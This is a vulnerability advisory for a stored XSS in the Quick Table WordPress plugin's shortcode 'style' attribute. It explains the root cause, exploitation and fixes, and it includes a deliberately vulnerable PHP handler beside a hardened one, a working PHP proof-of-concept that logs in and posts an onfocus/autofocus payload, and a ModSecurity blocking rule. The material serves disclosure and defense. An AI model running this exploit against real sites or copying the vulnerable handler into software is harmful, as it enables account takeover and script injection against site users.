Published : May 16, 2026

CVE-2026-6237: Quick Table <= 1.0.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'style' Shortcode Attribute (quick-table)

CVE ID CVE-2026-6237
Plugin quick-table
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.0.0
Patched Version None at time of disclosure
Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6237 (metadata-based): This vulnerability affects the Quick Table plugin for WordPress, specifically the 'style' attribute of the 'qtbl' shortcode. An authenticated attacker with Contributor-level access or higher can store a cross-site scripting (XSS) payload through this attribute. When a user, including an administrator, views a page or preview containing the malicious shortcode, the attacker's script executes in that user's browser. The CVSS score is 6.4 (medium severity): network attack vector, low attack complexity, low privileges required, no user interaction beyond viewing the page, and changed scope, because the injected script runs in the victim's browser rather than in the plugin's own security context.

Root Cause: The vulnerability stems from insufficient input sanitization and output escaping on the 'style' attribute of the 'qtbl' shortcode. Based on the CWE-79 classification, we infer that the plugin likely retrieves the 'style' parameter from the shortcode attributes array and outputs it directly into an HTML style attribute or a style tag without applying WordPress escaping functions such as esc_attr() or sanitize_text_field(). Atomic Edge analysis confirms that no code diff is available, so the exact mechanism is inferred from the CWE and the description. The plugin likely lacks proper validation, allowing an attacker to break out of the attribute context and inject event handlers or script tags.

Exploitation: An attacker with Contributor-level access creates a post containing the shortcode, for example [qtbl style="onfocus=alert(1) autofocus="]...[/qtbl], and submits it for review (a Contributor cannot publish; an Author or higher can). Because the style value is not sanitized, arbitrary HTML attributes or inline event handlers reach the rendered page. If the plugin writes the value inside a quoted style attribute, the payload must first close that quote; this is possible because shortcode_parse_atts() accepts a single-quoted attribute value that contains double quotes. The payload is stored in the database with the post content, so it fires whenever the post is rendered: when an Editor or Administrator previews the pending post, or on the public page once it is published. With autofocus, no interaction beyond loading the page is needed. The content reaches the database through WordPress's normal visual or text editor or the REST API, so no other weakness is required.

Remediation: The plugin developer should escape the value for the context it is written into. For an inline style attribute, pass the value through WordPress's safecss_filter_attr(), which keeps only allowed CSS properties and rejects constructs it does not permit, and then through esc_attr() at output time so that a quote in the value cannot terminate the attribute. A whitelist of allowed CSS properties, which safecss_filter_attr() already provides, gives defense in depth. sanitize_text_field() is not a substitute: it strips tags, but a quote followed by an event-handler attribute is not a tag and passes through unchanged. Since no patched version exists, site administrators should deactivate or remove the plugin, and should also review existing post content for [qtbl shortcodes whose style value contains a quote character or an on*= handler, because a stored payload remains in the database after the plugin is removed.
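To make the root cause and the fix concrete, here is an added example in the plugin's language. It is not code from Quick Table or from Atomic Edge: a minimal shortcode handler in the shape CWE-79 implies for 'qtbl', beside a hardened version that filters the value with safecss_filter_attr() and escapes it with esc_attr(). The function names, the table markup, the attribute default and the shim implementations of the WordPress functions (present only so the file runs outside WordPress) are assumptions; the real plugin's source is not on this page.

```php
<?php
// Added example, not code from the Quick Table plugin or from Atomic Edge.
// qtbl_vulnerable() shows the handler shape CWE-79 implies for the 'qtbl'
// shortcode; qtbl_hardened() shows the fix. Names and markup are assumptions.

// Stand-ins so the file runs outside WordPress. Inside WordPress the
// function_exists() guards skip them and core's own implementations are used.
// The safecss_filter_attr() stand-in is a deliberately small allow-list and is
// not a reimplementation of core's much larger one.
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $pairs, array $atts): array {
        $out = array();
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('safecss_filter_attr')) {
    function safecss_filter_attr($css): string {
        $allowed = array('width', 'height', 'color', 'background-color', 'border', 'text-align');
        $kept = array();
        foreach (explode(';', (string) $css) as $decl) {
            $parts = explode(':', $decl, 2);
            if (count($parts) !== 2) {
                continue;
            }
            $prop  = strtolower(trim($parts[0]));
            $value = trim($parts[1]);
            // Keep only an allowed property with a plain value (no quotes, no parentheses).
            if (in_array($prop, $allowed, true) && preg_match('/^[\w\s#%.,-]+$/', $value)) {
                $kept[] = $prop . ':' . $value;
            }
        }
        return implode(';', $kept);
    }
}

// Vulnerable shape: the attribute value is concatenated into markup unescaped,
// so a double quote inside the value closes the style attribute and whatever
// follows becomes new attributes of the <table> element.
function qtbl_vulnerable(array $atts, string $content = ''): string {
    $a = shortcode_atts(array('style' => ''), $atts);
    return '<table style="' . $a['style'] . '"><tr><td>' . $content . '</td></tr></table>';
}

// Hardened shape: reduce the value to allowed CSS first, then escape it for
// the attribute context. esc_attr() alone already prevents the breakout; the
// CSS filter additionally drops properties the plugin never meant to accept.
function qtbl_hardened(array $atts, string $content = ''): string {
    $a     = shortcode_atts(array('style' => ''), $atts);
    $css   = safecss_filter_attr($a['style']);
    $style = ($css !== '') ? ' style="' . esc_attr($css) . '"' : '';
    return '<table' . $style . '><tr><td>' . esc_html($content) . '</td></tr></table>';
}

// Constructed inputs. $malicious is the attribute array shortcode_parse_atts()
// yields for [qtbl style='" autofocus onfocus=alert(1) x="'] (a single-quoted
// shortcode attribute may contain double quotes); $benign is an ordinary value
// with one property that is not on the allow list.
$malicious = array('style' => '" autofocus onfocus=alert(1) x="');
$benign    = array('style' => 'width:100%; color:#333; position:fixed');

echo qtbl_vulnerable($malicious, 'A|B'), "\n";
echo qtbl_hardened($malicious, 'A|B'), "\n";
echo qtbl_hardened($benign, 'A|B'), "\n";
```

Run with php on the command line. The vulnerable handler emits a table element whose style attribute is empty and which carries the injected autofocus and onfocus attributes, the quote in the value having closed the attribute; the hardened handler emits a bare table element for the same input, and for the benign value keeps width and color while dropping position:fixed. Core's safecss_filter_attr() permits a far larger property set than the shim and also vets url() and similar functional values, so the shim stands in only for the test run.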

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user viewing the injected content. This can lead to session hijacking, theft of authentication cookies, privilege escalation (if an admin views the page), defacement, or redirection to malicious sites. The attacker can also perform actions on behalf of the victim, such as creating new admin users. The stored nature of the XSS amplifies the impact because the payload persists and affects all visitors.
Proof of Concept (PHP)

<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6237 - Quick Table <= 1.0.0 - Stored XSS via 'style' shortcode attribute
//
// Target settings. The original assignments were lost when the page was extracted
// (the "<= 1.0.0" above was swallowed as an HTML tag); the values below are
// placeholders and must be replaced before running.
$target_url = 'https://target.example';   // no trailing slash
$username   = 'contributor';              // any Contributor-or-higher account
$password   = 'password';
$login_url  = $target_url . '/wp-login.php';

// Step 1: Log in and store the session cookies
$login_data = array(
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
// wp-login.php expects the test cookie when testcookie=1 is posted
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_error($ch)) { die('Login failed: ' . curl_error($ch)); }
curl_close($ch);
// curl does not fail on bad credentials; WordPress re-renders the login form with an error
if (strpos($response, 'id="login_error"') !== false) { die('Login failed: bad credentials.'); }

// Step 2: Get the REST API nonce for post creation.
// admin-ajax.php?action=rest-nonce returns the nonce as plain text, not JSON;
// an unknown action or a logged-out session returns the string "0".
$admin_url  = $target_url . '/wp-admin/admin-ajax.php';
$nonce_data = array('action' => 'rest-nonce');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($nonce_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$nonce_response = curl_exec($ch);
curl_close($ch);

$nonce = trim((string) $nonce_response);
if ($nonce === '' || $nonce === '0') { die('Failed to retrieve REST nonce.'); }

// Step 3: Create a new post with the malicious shortcode.
// A Contributor cannot publish, so the post is submitted as 'pending'; the payload
// fires when an Editor or Administrator previews it, or on the public page once it
// is published. An Author-or-higher account may use 'publish' directly.
$post_data = array(
    'title'      => 'Atomic Edge PoC - Stored XSS Test',
    'content'    => '[qtbl style="onfocus=alert(1) autofocus="]Column1|Column2[/qtbl]',
    'status'     => 'pending',
    'categories' => array(1) // Default category
);

$rest_url = $target_url . '/wp-json/wp/v2/posts';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$post_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 201) {
    $created_post = json_decode($post_response, true);
    echo "[+] Post created (status: " . $created_post['status'] . ").\n";
    echo "[+] Link: " . $created_post['link'] . "\n";
    echo "[+] The payload runs when the post is rendered: on preview by a user who can edit a pending post, or on every page load once published.\n";
} else {
    echo "[-] Failed to create post. HTTP code: $http_code\n";
    echo "[-] Response: $post_response\n";
    exit(1);
}
?>
ModSecurity Rule

# Atomic Edge WAF Rule - CVE-2026-6237 (metadata-based)
# Blocks stored XSS via the 'style' attribute of the 'qtbl' shortcode in post content.
# The rule inspects the REST API endpoints for creating and updating posts and looks
# for a qtbl shortcode whose style attribute carries an inline event handler.
#
# Notes: the shortcode's opening bracket must be escaped in the regex (an unescaped
# '[' opens a character class); in a chain only the first rule carries the id; the
# REST body is JSON, so the JSON request body processor must be active for the
# request (the OWASP CRS enables it for Content-Type application/json) and the
# argument name then carries the processor's prefix, given here as json.content
# (an assumption: verify the exact name your engine version produces). Classic-editor
# saves through wp-admin/post.php and other non-REST paths are not covered by this rule.
SecRule REQUEST_URI "@rx ^/wp-json/wp/v2/posts(/\d+)?$" \
    "id:20261997,phase:2,deny,status:403,chain,msg:'CVE-2026-6237 - Stored XSS via qtbl shortcode style attribute',severity:'CRITICAL',tag:'CVE-2026-6237'"
    SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" "chain"
    SecRule ARGS:content|ARGS:json.content "@rx \[qtbl\s[^\]]*style\s*=\s*['\"][^\]]*\bon\w+\s*=" \
        "t:urlDecode,t:lowercase"
